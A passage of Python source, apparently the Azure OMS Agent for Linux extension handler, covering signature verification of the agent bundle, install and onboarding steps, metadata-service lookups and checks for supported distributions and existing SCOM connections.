RestartOMSAgentServiceCommand = '{0} restart'.format(OMSAgentServiceScript)
DisableOMSAgentServiceCommand = '{0} disable'.format(OMSAgentServiceScript)
# Cloud Environments
PublicCloudName = "AzurePublicCloud"
FairfaxCloudName = "AzureUSGovernmentCloud"
MooncakeCloudName = "AzureChinaCloud"
USNatCloudName = "USNat" # EX
USSecCloudName = "USSec" # RX
DefaultCloudName = PublicCloudName # Fallback
CloudDomainMap = {
PublicCloudName: "opinsights.azure.com",
FairfaxCloudName: "opinsights.azure.us",
MooncakeCloudName: "opinsights.azure.cn",
USNatCloudName: "opinsights.azure.eaglex.ic.gov",
USSecCloudName: "opinsights.azure.microsoft.scloud"
}
# Error codes
DPKGLockedErrorCode = 55 #56, temporary as it excludes from SLA
InstallErrorCurlNotInstalled = 55 #64, temporary as it excludes from SLA
EnableErrorOMSReturned403 = 5
EnableErrorOMSReturnedNon200 = 6
EnableErrorResolvingHost = 7
EnableErrorOnboarding = 8
EnableCalledBeforeSuccessfulInstall = 52 # since install is a missing dependency
UnsupportedOpenSSL = 55 #60, temporary as it excludes from SLA
# OneClick error codes
OneClickErrorCode = 40
ManagedIdentityExtMissingErrorCode = 41
ManagedIdentityExtErrorCode = 42
MetadataAPIErrorCode = 43
OMSServiceOneClickErrorCode = 44
MissingorInvalidParameterErrorCode = 11
UnwantedMultipleConnectionsErrorCode = 10
CannotConnectToOMSErrorCode = 55
UnsupportedOperatingSystem = 51
# Configuration
HUtilObject = None
SettingsSequenceNumber = None
HandlerEnvironment = None
SettingsDict = None
# OneClick Constants
ManagedIdentityExtListeningURLPath = '/var/lib/waagent/ManagedIdentity-Settings'
GUIDRegex = '[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}'
OAuthTokenResource = 'https://management.core.windows.net/'
OMSServiceValidationEndpoint = 'https://global.oms.opinsights.azure.com/ManagedIdentityService.svc/Validate'
AutoManagedWorkspaceCreationSleepSeconds = 20
# agent permissions
AgentUser='omsagent'
AgentGroup='omiusers'
# Change permission of log path - if we fail, that is not an exit case
try:
ext_log_path = '/var/log/azure/'
if os.path.exists(ext_log_path):
os.system('chmod {1} {0}'.format(ext_log_path, 700))
except:
pass
"""
What need to be packaged to make the signing work:
keys
dscgpgkey.asc
msgpgkey.asc
packages
omsagent-*.universal.x64.asc
omsagent-*.universal.x64.sha256sums
"""
def verifyShellBundleSigningAndChecksum():
cert_directory = os.path.join(os.getcwd(), PackagesDirectory)
keys_directory = os.path.join(os.getcwd(), keysDirectory)
# import GPG key
dscGPGKeyFilePath = os.path.join(keys_directory, 'dscgpgkey.asc')
if not os.path.isfile(dscGPGKeyFilePath):
raise Exception("Unable to find the dscgpgkey.asc file at " + dscGPGKeyFilePath)
importGPGKeyCommand = "sh ImportGPGkey.sh " + dscGPGKeyFilePath
exit_code, output = run_command_with_retries_output(importGPGKeyCommand, retries = 0, retry_check = retry_skip, check_error = False)
# Check that we can find the keyring file
keyringFilePath = os.path.join(keys_directory, 'keyring.gpg')
if not os.path.isfile(keyringFilePath):
raise Exception("Unable to find the Extension keyring file at " + keyringFilePath)
# Check that we can find the asc file
bundleFileName, file_ext = os.path.splitext(BundleFileName)
ascFilePath = os.path.join(cert_directory, bundleFileName + ".asc")
if not os.path.isfile(ascFilePath):
raise Exception("Unable to find the OMS shell bundle asc file at " + ascFilePath)
# check that we can find the SHA256 sums file
sha256SumsFilePath = os.path.join(cert_directory, bundleFileName + ".sha256sums")
if not os.path.isfile(sha256SumsFilePath):
raise Exception("Unable to find the OMS shell bundle SHA256 sums file at " + sha256SumsFilePath)
# Verify the SHA256 sums file with the keyring and asc files
verifySha256SumsCommand = "HOME=" + keysDirectory + " gpg --no-default-keyring --keyring " + keyringFilePath + " --verify " + ascFilePath + " " + sha256SumsFilePath
exit_code, output = run_command_with_retries_output(verifySha256SumsCommand, retries = 0, retry_check = retry_skip, check_error = False)
if exit_code != 0:
raise Exception("Failed to verify SHA256 sums file at " + sha256SumsFilePath)
# Perform SHA256 sums to verify shell bundle
hutil_log_info("Perform SHA256 sums to verify shell bundle")
performSha256SumsCommand = "cd %s; sha256sum -c %s" % (cert_directory, sha256SumsFilePath)
exit_code, output = run_command_with_retries_output(performSha256SumsCommand, retries = 0, retry_check = retry_skip, check_error = False)
if exit_code != 0:
raise Exception("Failed to verify shell bundle with the SHA256 sums file at " + sha256SumsFilePath)
def main():
"""
Main method
Parse out operation from argument, invoke the operation, and finish.
"""
init_waagent_logger()
waagent_log_info('OmsAgentForLinux started to handle.')
global IsUpgrade
# Determine the operation being executed
operation = None
try:
option = sys.argv[1]
if re.match('^([-/]*)(disable)', option):
operation = 'Disable'
elif re.match('^([-/]*)(uninstall)', option):
operation = 'Uninstall'
elif re.match('^([-/]*)(install)', option):
operation = 'Install'
elif re.match('^([-/]*)(enable)', option):
operation = 'Enable'
elif re.match('^([-/]*)(update)', option):
operation = 'Update'
IsUpgrade = True
elif re.match('^([-/]*)(telemetry)', option):
operation = 'Telemetry'
except Exception as e:
waagent_log_error(str(e))
if operation is None:
log_and_exit('Unknown', 1, 'No valid operation provided')
# Set up for exit code and any error messages
exit_code = 0
message = '{0} succeeded'.format(operation)
# Clean status file to mitigate diskspace issues on small VMs
status_files = [
"/var/opt/microsoft/omsconfig/status/dscperformconsistency",
"/var/opt/microsoft/omsconfig/status/dscperforminventory",
"/var/opt/microsoft/omsconfig/status/dscsetlcm",
"/var/opt/microsoft/omsconfig/status/omsconfighost"
]
for sf in status_files:
if os.path.isfile(sf):
if sf.startswith("/var/opt/microsoft/omsconfig/status"):
try:
os.remove(sf)
except Exception as e:
hutil_log_info('Error removing telemetry status file before installation: {0}'.format(sf))
hutil_log_info('Exception info: {0}'.format(traceback.format_exc()))
exit_code = check_disk_space_availability()
if exit_code is not 0:
message = '{0} failed due to low disk space'.format(operation)
log_and_exit(operation, exit_code, message)
# Invoke operation
try:
global HUtilObject
HUtilObject = parse_context(operation)
# Verify shell bundle signing
try:
hutil_log_info("Start signing verification")
verifyShellBundleSigningAndChecksum()
hutil_log_info("ShellBundle signing verification succeeded")
except Exception as ex:
errmsg = "ShellBundle signing verification failed with '%s'" % ex.message
if ProceedOnSigningVerificationFailure:
hutil_log_error(errmsg)
else:
log_and_exit(operation, errmsg)
# invoke operation
exit_code, output = operations[operation]()
# Exit code 1 indicates a general problem that doesn't have a more
# specific error code; it often indicates a missing dependency
if exit_code is 1 and operation == 'Install':
message = 'Install failed with exit code 1. Please check that ' \
'dependencies are installed. For details, check logs ' \
'in /var/log/azure/Microsoft.EnterpriseCloud.' \
'Monitoring.OmsAgentForLinux'
elif exit_code is 127 and operation == 'Install':
# happens if shell bundle couldn't be extracted due to low space or missing dependency
exit_code = 52 # since it is a missing dependency
message = 'Install failed with exit code 127. Please check that ' \
'dependencies are installed. For details, check logs ' \
'in /var/log/azure/Microsoft.EnterpriseCloud.' \
'Monitoring.OmsAgentForLinux'
elif exit_code is DPKGLockedErrorCode and operation == 'Install':
message = 'Install failed with exit code {0} because the ' \
'package manager on the VM is currently locked: ' \
'please wait and try again'.format(DPKGLockedErrorCode)
elif exit_code is not 0:
message = '{0} failed with exit code {1} {2}'.format(operation,
exit_code, output)
except OmsAgentForLinuxException as e:
exit_code = e.error_code
message = e.get_error_message(operation)
except Exception as e:
exit_code = 1
message = '{0} failed with error: {1}\n' \
'Stacktrace: {2}'.format(operation, e,
traceback.format_exc())
# Finish up and log messages
log_and_exit(operation, exit_code, message)
def check_disk_space_availability():
"""
Check if there is the required space on the machine.
"""
try:
if get_free_space_mb("/var") < 500 or get_free_space_mb("/etc") < 500 or get_free_space_mb("/opt") < 500:
# 52 is the exit code for missing dependency i.e. disk space
# https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
return 52
else:
return 0
except:
print('Failed to check disk usage.')
return 0
def get_free_space_mb(dirname):
"""
Get the free space in MB in the directory path.
"""
st = os.statvfs(dirname)
return (st.f_bavail * st.f_frsize) // (1024 * 1024)
def stop_telemetry_process():
pids_filepath = os.path.join(os.getcwd(),'omstelemetry.pid')
# kill existing telemetry watcher
if os.path.exists(pids_filepath):
with open(pids_filepath, "r") as f:
for pid in f.readlines():
# Verify the pid actually belongs to omsagent.
cmd_file = os.path.join("/proc", str(pid.strip("\n")), "cmdline")
if os.path.exists(cmd_file):
with open(cmd_file, "r") as pidf:
cmdline = pidf.readlines()
if cmdline[0].find("omsagent.py") >= 0 and cmdline[0].find("-telemetry") >= 0:
kill_cmd = "kill " + pid
run_command_and_log(kill_cmd)
run_command_and_log("rm "+pids_filepath)
def start_telemetry_process():
"""
Start telemetry process that performs periodic monitoring activities
:return: None
"""
stop_telemetry_process()
#start telemetry watcher
omsagent_filepath = os.path.join(os.getcwd(),'omsagent.py')
args = ['python{0}'.format(sys.version_info[0]), omsagent_filepath, '-telemetry']
log = open(os.path.join(os.getcwd(), 'daemon.log'), 'w')
hutil_log_info('start watcher process '+str(args))
subprocess.Popen(args, stdout=log, stderr=log)
def telemetry():
pids_filepath = os.path.join(os.getcwd(), 'omstelemetry.pid')
py_pid = os.getpid()
with open(pids_filepath, 'w') as f:
f.write(str(py_pid) + '\n')
if HUtilObject is not None:
watcher = watcherutil.Watcher(HUtilObject.error, HUtilObject.log)
watcher_thread = Thread(target = watcher.watch)
self_mon_thread = Thread(target = watcher.monitor_health)
watcher_thread.start()
self_mon_thread.start()
watcher_thread.join()
self_mon_thread.join()
return 0, ""
def prepare_update():
"""
Copy / move configuration directory to the backup
"""
# First check if backup directory was previously created for given workspace.
# If it is created with all the files , we need not move the files again.
public_settings, _ = get_settings()
workspaceId = public_settings.get('workspaceId')
etc_remove_path = os.path.join(EtcOMSAgentPath, workspaceId)
etc_move_path = os.path.join(EtcOMSAgentPath, ExtensionStateSubdirectory, workspaceId)
if (not os.path.isdir(etc_move_path)):
shutil.move(etc_remove_path, etc_move_path)
return 0, ""
def restore_state(workspaceId):
"""
Copy / move state from backup to the expected location.
"""
try:
etc_backup_path = os.path.join(EtcOMSAgentPath, ExtensionStateSubdirectory, workspaceId)
etc_final_path = os.path.join(EtcOMSAgentPath, workspaceId)
if (os.path.isdir(etc_backup_path) and not os.path.isdir(etc_final_path)):
shutil.move(etc_backup_path, etc_final_path)
except Exception as e:
hutil_log_error("Error while restoring the state. Exception : "+traceback.format_exc())
def install():
"""
Ensure that this VM distro and version are supported.
Install the OMSAgent shell bundle, using retries.
Note: install operation times out from WAAgent at 15 minutes, so do not
wait longer.
"""
exit_if_vm_not_supported('Install')
public_settings, protected_settings = get_settings()
if public_settings is None:
raise ParameterMissingException('Public configuration must be ' \
'provided')
workspaceId = public_settings.get('workspaceId')
check_workspace_id(workspaceId)
# Take the backup of the state for given workspace.
restore_state(workspaceId)
# In the case where a SCOM connection is already present, we should not
# create conflicts by installing the OMSAgent packages
stopOnMultipleConnections = public_settings.get('stopOnMultipleConnections')
if (stopOnMultipleConnections is not None
and stopOnMultipleConnections is True):
detect_multiple_connections(workspaceId)
package_directory = os.path.join(os.getcwd(), PackagesDirectory)
bundle_path = os.path.join(package_directory, BundleFileName)
os.chmod(bundle_path, 100)
cmd = InstallCommandTemplate.format(bundle_path)
hutil_log_info('Running command "{0}"'.format(cmd))
# Retry, since install can fail due to concurrent package operations
exit_code, output = run_command_with_retries_output(cmd, retries = 15,
retry_check = retry_if_dpkg_locked_or_curl_is_not_found,
final_check = final_check_if_dpkg_locked)
return exit_code, output
def check_kill_process(pstring):
for line in os.popen("ps ax | grep " + pstring + " | grep -v grep"):
fields = line.split()
pid = fields[0]
os.kill(int(pid), signal.SIGKILL)
def uninstall():
"""
Uninstall the OMSAgent shell bundle.
This is a somewhat soft uninstall. It is not a purge.
Note: uninstall operation times out from WAAgent at 5 minutes
"""
package_directory = os.path.join(os.getcwd(), PackagesDirectory)
bundle_path = os.path.join(package_directory, BundleFileName)
global IsUpgrade
os.chmod(bundle_path, 100)
cmd = UninstallCommandTemplate.format(bundle_path)
hutil_log_info('Running command "{0}"'.format(cmd))
# Retry, since uninstall can fail due to concurrent package operations
try:
exit_code, output = run_command_with_retries_output(cmd, retries = 5,
retry_check = retry_if_dpkg_locked_or_curl_is_not_found,
final_check = final_check_if_dpkg_locked)
except Exception as e:
# try to force clean the installation
try:
check_kill_process("omsagent")
exit_code = 0
except Exception as ex:
exit_code = 1
message = 'Uninstall failed with error: {0}\n' \
'Stacktrace: {1}'.format(ex, traceback.format_exc())
if IsUpgrade:
IsUpgrade = False
else:
remove_workspace_configuration()
return exit_code, output
def enable():
"""
Onboard the OMSAgent to the specified OMS workspace.
This includes enabling the OMS process on the VM.
This call will return non-zero or throw an exception if
the settings provided are incomplete or incorrect.
Note: enable operation times out from WAAgent at 5 minutes
"""
exit_if_vm_not_supported('Enable')
public_settings, protected_settings = get_settings()
if public_settings is None:
raise ParameterMissingException('Public configuration must be ' \
'provided')
if protected_settings is None:
raise ParameterMissingException('Private configuration must be ' \
'provided')
vmResourceId = protected_settings.get('vmResourceId')
# If vmResourceId is not provided in private settings, get it from metadata API
if vmResourceId is None or not vmResourceId:
vmResourceId = get_vmresourceid_from_metadata()
hutil_log_info('vmResourceId from Metadata API is {0}'.format(vmResourceId))
if vmResourceId is None:
hutil_log_info('This may be a classic VM')
enableAutomaticManagement = public_settings.get('enableAutomaticManagement')
if (enableAutomaticManagement is not None
and enableAutomaticManagement is True):
hutil_log_info('enableAutomaticManagement is set to true; the ' \
'workspace ID and key will be determined by the OMS ' \
'service.')
workspaceInfo = retrieve_managed_workspace(vmResourceId)
if (workspaceInfo is None or 'WorkspaceId' not in workspaceInfo
or 'WorkspaceKey' not in workspaceInfo):
raise OneClickException('Workspace info was not determined')
else:
# Note: do NOT log workspace keys!
hutil_log_info('Managed workspaceInfo has been retrieved')
workspaceId = workspaceInfo['WorkspaceId']
workspaceKey = workspaceInfo['WorkspaceKey']
try:
check_workspace_id_and_key(workspaceId, workspaceKey)
except InvalidParameterError as e:
raise OMSServiceOneClickException('Received invalid ' \
'workspace info: ' \
'{0}'.format(e))
else:
workspaceId = public_settings.get('workspaceId')
workspaceKey = protected_settings.get('workspaceKey')
check_workspace_id_and_key(workspaceId, workspaceKey)
# Check if omsadmin script is available
if not os.path.exists(OMSAdminPath):
log_and_exit('Enable', EnableCalledBeforeSuccessfulInstall,
'OMSAgent onboarding script {0} does not exist. Enable ' \
'cannot be called before install.'.format(OMSAdminPath))
vmResourceIdParam = '-a {0}'.format(vmResourceId)
proxy = protected_settings.get('proxy')
proxyParam = ''
if proxy is not None:
proxyParam = '-p {0}'.format(proxy)
# get domain from protected settings
domain = protected_settings.get('domain')
if domain is None:
# detect opinsights domain using IMDS
domain = get_azure_cloud_domain()
else:
hutil_log_info("Domain retrieved from protected settings '{0}'".format(domain))
domainParam = ''
if domain:
domainParam = '-d {0}'.format(domain)
optionalParams = '{0} {1} {2}'.format(domainParam, proxyParam, vmResourceIdParam)
onboard_cmd = OnboardCommandWithOptionalParams.format(OMSAdminPath,
workspaceId,
workspaceKey,
optionalParams)
hutil_log_info('Handler initiating onboarding.')
exit_code, output = run_command_with_retries_output(onboard_cmd, retries = 5,
retry_check = retry_onboarding,
final_check = raise_if_no_internet,
check_error = True, log_cmd = False)
# now ensure the permissions and ownership is set recursively
try:
workspaceId = public_settings.get('workspaceId')
etc_final_path = os.path.join(EtcOMSAgentPath, workspaceId)
if (os.path.isdir(etc_final_path)):
uid = pwd.getpwnam(AgentUser).pw_uid
gid = grp.getgrnam(AgentGroup).gr_gid
os.chown(etc_final_path, uid, gid)
os.system('chmod {1} {0}'.format(etc_final_path, 750))
for root, dirs, files in os.walk(etc_final_path):
for d in dirs:
os.chown(os.path.join(root, d), uid, gid)
os.system('chmod {1} {0}'.format(os.path.join(root, d), 750))
for f in files:
os.chown(os.path.join(root, f), uid, gid)
os.system('chmod {1} {0}'.format(os.path.join(root, f), 640))
except:
hutil_log_info('Failed to set permissions for OMS directories, could potentially have issues uploading.')
if exit_code is 0:
# Create a marker file to denote the workspace that was
# onboarded using the extension. This will allow supporting
# multi-homing through the extension like Windows does
extension_marker_path = os.path.join(EtcOMSAgentPath, workspaceId,
'conf/.azure_extension_marker')
if os.path.exists(extension_marker_path):
hutil_log_info('Extension marker file {0} already ' \
'created'.format(extension_marker_path))
else:
try:
open(extension_marker_path, 'w').close()
hutil_log_info('Created extension marker file ' \
'{0}'.format(extension_marker_path))
except IOError as e:
try:
open(extension_marker_path, 'w+').close()
hutil_log_info('Created extension marker file ' \
'{0}'.format(extension_marker_path))
except IOError as ex:
hutil_log_error('Error creating {0} with error: ' \
'{1}'.format(extension_marker_path, ex))
# we are having some kind of permissions issue creating the marker file
output = "Couldn't create marker file"
exit_code = 52 # since it is a missing dependency
# Sleep to prevent bombarding the processes, then restart all processes
# to resolve any issues with auto-started processes from --upgrade
time.sleep(PostOnboardingSleepSeconds)
run_command_and_log(RestartOMSAgentServiceCommand)
#start telemetry process if enable is successful
start_telemetry_process()
return exit_code, output
def remove_workspace_configuration():
"""
This is needed to distinguish between extension removal vs extension upgrade.
Its a workaround for waagent upgrade routine calling 'remove' on an old version
before calling 'upgrade' on new extension version issue.
In upgrade case, we need workspace configuration to persist when in
remove case we need all the files be removed.
This method will remove all the files/folders from the workspace path in Etc and Var.
"""
public_settings, _ = get_settings()
workspaceId = public_settings.get('workspaceId')
etc_remove_path = os.path.join(EtcOMSAgentPath, workspaceId)
var_remove_path = os.path.join(VarOMSAgentPath, workspaceId)
shutil.rmtree(etc_remove_path, True)
shutil.rmtree(var_remove_path, True)
hutil_log_info('Moved oms etc configuration directory and cleaned up var directory')
def is_arc_installed():
"""
Check if the system is on an Arc machine
"""
# Using systemctl to check this since Arc only supports VMs that have systemd
check_arc = os.system('systemctl status himdsd 1>/dev/null 2>&1')
return check_arc == 0
def get_arc_endpoint():
"""
Find the endpoint for Arc Hybrid IMDS
"""
endpoint_filepath = '/lib/systemd/system.conf.d/azcmagent.conf'
endpoint = ''
try:
with open(endpoint_filepath, 'r') as f:
data = f.read()
endpoint = data.split("\"IMDS_ENDPOINT=")[1].split("\"\n")[0]
except:
hutil_log_error('Unable to load Arc IMDS endpoint from {0}'.format(endpoint_filepath))
return endpoint
def get_imds_endpoint():
"""
Find the endpoint for IMDS, whether Arc or not
"""
azure_imds_endpoint = 'http://169.254.169.254/metadata/instance?api-version=2018-10-01'
if (is_arc_installed()):
hutil_log_info('Arc is installed, loading Arc-specific IMDS endpoint')
imds_endpoint = get_arc_endpoint()
if imds_endpoint:
imds_endpoint += '/metadata/instance?api-version=2019-08-15'
else:
# Fall back to the traditional IMDS endpoint; the cloud domain and VM
# resource id detection logic are resilient to failed queries to IMDS
imds_endpoint = azure_imds_endpoint
hutil_log_info('Falling back to default Azure IMDS endpoint')
else:
imds_endpoint = azure_imds_endpoint
hutil_log_info('Using IMDS endpoint "{0}"'.format(imds_endpoint))
return imds_endpoint
def get_vmresourceid_from_metadata():
imds_endpoint = get_imds_endpoint()
req = urllib.request.Request(imds_endpoint)
req.add_header('Metadata', 'True')
try:
response = json.loads(urllib.request.urlopen(req).read())
if ('compute' not in response or response['compute'] is None):
return None # classic vm
if response['compute']['vmScaleSetName']:
return '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.Compute/virtualMachineScaleSets/{2}/virtualMachines/{3}'.format(response['compute']['subscriptionId'],response['compute']['resourceGroupName'],response['compute']['vmScaleSetName'],response['compute']['name'])
else:
return '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.Compute/virtualMachines/{2}'.format(response['compute']['subscriptionId'],response['compute']['resourceGroupName'],response['compute']['name'])
except urllib.error.HTTPError as e:
hutil_log_error('Request to Metadata service URL ' \
'failed with an HTTPError: {0}'.format(e))
hutil_log_info('Response from Metadata service: ' \
'{0}'.format(e.read()))
return None
except:
hutil_log_error('Unexpected error from Metadata service')
return None
def get_azure_environment_from_imds():
imds_endpoint = get_imds_endpoint()
req = urllib.request.Request(imds_endpoint)
req.add_header('Metadata', 'True')
try:
response = json.loads(urllib.request.urlopen(req).read())
if ('compute' not in response or response['compute'] is None):
return None # classic vm
if ('azEnvironment' not in response['compute'] or response['compute']['azEnvironment'] is None):
return None # classic vm
return response['compute']['azEnvironment']
except urllib.error.HTTPError as e:
hutil_log_error('Request to Metadata service URL ' \
'failed with an HTTPError: {0}'.format(e))
hutil_log_info('Response from Metadata service: ' \
'{0}'.format(e.read()))
return None
except:
hutil_log_error('Unexpected error from Metadata service')
return None
def get_azure_cloud_domain():
try:
environment = get_azure_environment_from_imds()
if environment:
for cloud, domain in CloudDomainMap.items():
if environment.lower() == cloud.lower():
hutil_log_info('Detected cloud environment "{0}" via IMDS. The domain "{1}" will be used.'.format(cloud, domain))
return domain
hutil_log_info('Unknown cloud environment "{0}"'.format(environment))
except Exception as e:
hutil_log_error('Failed to detect cloud environment: {0}'.format(e))
hutil_log_info('Falling back to default domain "{0}"'.format(CloudDomainMap[DefaultCloudName]))
return CloudDomainMap[DefaultCloudName]
def retrieve_managed_workspace(vm_resource_id):
"""
EnableAutomaticManagement has been set to true; the
ManagedIdentity extension and the VM Resource ID are also
required for the OneClick scenario
Using these and the Metadata API, we will call the OMS service
to determine what workspace ID and key to onboard to
"""
# Check for OneClick scenario requirements:
if not os.path.exists(ManagedIdentityExtListeningURLPath):
raise ManagedIdentityExtMissingException
# Determine the Tenant ID using the Metadata API
tenant_id = get_tenant_id_from_metadata_api(vm_resource_id)
# Retrieve an OAuth token using the ManagedIdentity extension
if tenant_id is not None:
hutil_log_info('Tenant ID from Metadata API is {0}'.format(tenant_id))
access_token = get_access_token(tenant_id, OAuthTokenResource)
else:
return None
# Query OMS service for the workspace info for onboarding
if tenant_id is not None and access_token is not None:
return get_workspace_info_from_oms(vm_resource_id, tenant_id,
access_token)
else:
return None
def disable():
"""
Disable all OMS workspace processes on the VM.
Note: disable operation times out from WAAgent at 15 minutes
"""
#stop the telemetry process
stop_telemetry_process()
# Check if the service control script is available
if not os.path.exists(OMSAgentServiceScript):
log_and_exit('Disable', 1, 'OMSAgent service control script {0} does' \
'not exist. Disable cannot be called ' \
'before install.'.format(OMSAgentServiceScript))
return 1
exit_code, output = run_command_and_log(DisableOMSAgentServiceCommand)
return exit_code, output
# Dictionary of operations strings to methods
operations = {'Disable' : disable,
'Uninstall' : uninstall,
'Install' : install,
'Enable' : enable,
# For update call we will only prepare the update by taking some backup of the state
# since omsagent.py->install() will be called
# everytime upgrade is done due to upgradeMode =
# "UpgradeWithInstall" set in HandlerManifest
'Update' : prepare_update,
'Telemetry' : telemetry
}
def parse_context(operation):
"""
Initialize a HandlerUtil object for this operation.
If the required modules have not been imported, this will return None.
"""
hutil = None
if ('Utils.WAAgentUtil' in sys.modules
and 'Utils.HandlerUtil' in sys.modules):
try:
logFileName = 'extension.log'
if (operation == 'Telemetry'):
logFileName = 'watcher.log'
hutil = HUtil.HandlerUtility(waagent.Log, waagent.Error, logFileName=logFileName)
hutil.do_parse_context(operation)
# parse_context may throw KeyError if necessary JSON key is not
# present in settings
except KeyError as e:
waagent_log_error('Unable to parse context with error: ' \
'{0}'.format(e))
raise ParameterMissingException
return hutil
def is_vm_supported_for_extension():
"""
Checks if the VM this extension is running on is supported by OMSAgent
Returns for platform.linux_distribution() vary widely in format, such as
'7.3.1611' returned for a VM with CentOS 7, so the first provided
digits must match
The supported distros of the OMSAgent-for-Linux are allowed to utilize
this VM extension. All other distros will get error code 51
"""
supported_dists = {'redhat' : ['6', '7', '8'], 'red hat' : ['6', '7', '8'], 'rhel' : ['6', '7', '8'], # Red Hat
'centos' : ['6', '7', '8'], # CentOS
'oracle' : ['6', '7', '8'], 'ol': ['6', '7', '8'], # Oracle
'debian' : ['8', '9'], # Debian
'ubuntu' : ['14.04', '16.04', '18.04', '20.04'], # Ubuntu
'suse' : ['12', '15'], 'sles' : ['12', '15'], # SLES
'amzn' : ['2'] # AWS
}
vm_dist, vm_ver, vm_supported = '', '', False
try:
vm_dist, vm_ver, vm_id = platform.linux_distribution()
except AttributeError:
try:
vm_dist, vm_ver, vm_id = platform.dist()
except AttributeError:
hutil_log_info("Falling back to /etc/os-release distribution parsing")
# Fallback if either of the above fail; on some (especially newer)
# distros, linux_distribution() and dist() are unreliable or deprecated
if not vm_dist and not vm_ver:
try:
with open('/etc/os-release', 'r') as fp:
for line in fp:
if line.startswith('ID='):
vm_dist = line.split('=')[1]
vm_dist = vm_dist.split('-')[0]
vm_dist = vm_dist.replace('\"', '').replace('\n', '')
elif line.startswith('VERSION_ID='):
vm_ver = line.split('=')[1]
vm_ver = vm_ver.replace('\"', '').replace('\n', '')
except:
return vm_supported, 'Indeterminate operating system', ''
# Find this VM distribution in the supported list
for supported_dist in list(supported_dists.keys()):
if not vm_dist.lower().startswith(supported_dist):
continue
# Check if this VM distribution version is supported
vm_ver_split = vm_ver.split('.')
for supported_ver in supported_dists[supported_dist]:
supported_ver_split = supported_ver.split('.')
# If vm_ver is at least as precise (at least as many digits) as
# supported_ver and matches all the supported_ver digits, then
# this VM is guaranteed to be supported
vm_ver_match = True
for idx, supported_ver_num in enumerate(supported_ver_split):
try:
supported_ver_num = int(supported_ver_num)
vm_ver_num = int(vm_ver_split[idx])
except IndexError:
vm_ver_match = False
break
if vm_ver_num is not supported_ver_num:
vm_ver_match = False
break
if vm_ver_match:
vm_supported = True
break
if vm_supported:
break
return vm_supported, vm_dist, vm_ver
def exit_if_vm_not_supported(operation):
"""
Check if this VM distro and version are supported by the OMSAgent.
If this VM is not supported, log the proper error code and exit.
"""
vm_supported, vm_dist, vm_ver = is_vm_supported_for_extension()
if not vm_supported:
log_and_exit(operation, UnsupportedOperatingSystem, 'Unsupported operating system: ' \
'{0} {1}'.format(vm_dist, vm_ver))
return 0
def exit_if_openssl_unavailable(operation):
"""
Check if the openssl commandline interface is available to use
If not, throw error to return UnsupportedOpenSSL error code
"""
exit_code, output = run_get_output('which openssl', True, False)
if exit_code is not 0:
log_and_exit(operation, UnsupportedOpenSSL, 'OpenSSL is not available')
return 0
def check_workspace_id_and_key(workspace_id, workspace_key):
"""
Validate formats of workspace_id and workspace_key
"""
check_workspace_id(workspace_id)
# Validate that workspace_key is of the correct format (base64-encoded)
if workspace_key is None:
raise ParameterMissingException('Workspace key must be provided')
try:
encoded_key = base64.b64encode(base64.b64decode(workspace_key))
if sys.version_info >= (3,): # in python 3, base64.b64encode will return bytes, so decode to str for comparison
encoded_key = encoded_key.decode()
if encoded_key != workspace_key:
raise InvalidParameterError('Workspace key is invalid')
except TypeError:
raise InvalidParameterError('Workspace key is invalid')
def check_workspace_id(workspace_id):
"""
Validate that workspace_id matches the GUID regex
"""
if workspace_id is None:
raise ParameterMissingException('Workspace ID must be provided')
search = re.compile(GUIDOnlyRegex, re.M)
if not search.match(workspace_id):
raise InvalidParameterError('Workspace ID is invalid')
def detect_multiple_connections(workspace_id):
"""
If the VM already has a workspace/SCOM configured, then we should
disallow a new connection when stopOnMultipleConnections is used
Throw an exception in these cases:
- The workspace with the given workspace_id has not been onboarded
to the VM, but at least one other workspace has been
- The workspace with the given workspace_id has not been onboarded
to the VM, and the VM is connected to SCOM
If the extension operation is connecting to an already-configured
workspace, it is not a stopping case
"""
other_connection_exists = False
if os.path.exists(OMSAdminPath):
exit_code, utfoutput = run_get_output(WorkspaceCheckCommand,
chk_err = False)
# output may contain unicode characters not supported by ascii
# for e.g., generates the following error if used without conversion: UnicodeDecodeError: 'ascii' codec can't decode byte 0xc3 in position 18: ordinal not in range(128)
# default encoding in python is ascii in python < 3
if sys.version_info < (3,):
output = utfoutput.decode('utf8').encode('utf8')
if output.strip().lower() != 'no workspace':
for line in output.split('\n'):
if workspace_id in line:
hutil_log_info('The workspace to be enabled has already ' \
'been configured on the VM before; ' \
'continuing despite ' \
'stopOnMultipleConnections flag')
return
else:
# Note: if scom workspace dir is created, a line containing
# "Workspace(SCOM Workspace): scom" will be here
# If any other line is here, it may start sending data later
other_connection_exists = True
else:
for dir_name, sub_dirs, files in os.walk(EtcOMSAgentPath):
for sub_dir in sub_dirs:
sub_dir_name = os.path.basename(sub_dir)
workspace_search = re.compile(GUIDOnlyRegex, re.M)
if sub_dir_name == workspace_id:
hutil_log_info('The workspace to be enabled has already ' \
'been configured on the VM before; ' \
'continuing despite ' \
'stopOnMultipleConnections flag')
return
elif (workspace_search.match(sub_dir_name)
or sub_dir_name == 'scom'):
other_connection_exists = True
if other_connection_exists:
err_msg = ('This machine is already connected to some other Log ' \
'Analytics workspace, please set ' \
'stopOnMultipleConnections to false in public ' \
'settings or remove this property, so this machine ' \
'can connect to new workspaces, also it means this ' \
'machine will get billed multiple times for each ' \
'workspace it report to. ' \
'(LINUXOMSAGENTEXTENSION_ERROR_MULTIPLECONNECTIONS)')
# This exception will get caught by the main method
raise UnwantedMultipleConnectionsException(err_msg)
else:
detect_scom_connection()
def detect_scom_connection():
"""
If these two conditions are met, then we can assume the
VM is monitored
by SCOM:
1. SCOMPort is open and omiserver is listening on it
2. scx certificate is signed by SCOM server
To determine it check for existence of below two
conditions:
1. SCOMPort is open and omiserver is listening on it:
/etc/omi/conf/omiserver.conf can be parsed to
determine it.
2. scx certificate is signed by SCOM server: scom cert
is present @ /etc/opt/omi/ssl/omi-host-<hostname>.pem
(/etc/opt/microsoft/scx/ssl/scx.pem is a softlink to
this). If the VM is monitored by SCOM then issuer
field of the certificate will have a value like
CN=SCX-Certificate/title=<GUID>, DC=<SCOM server hostname>
(e.g CN=SCX-Certificate/title=SCX94a1f46d-2ced-4739-9b6a-1f06156ca4ac,
DC=NEB-OM-1502733)
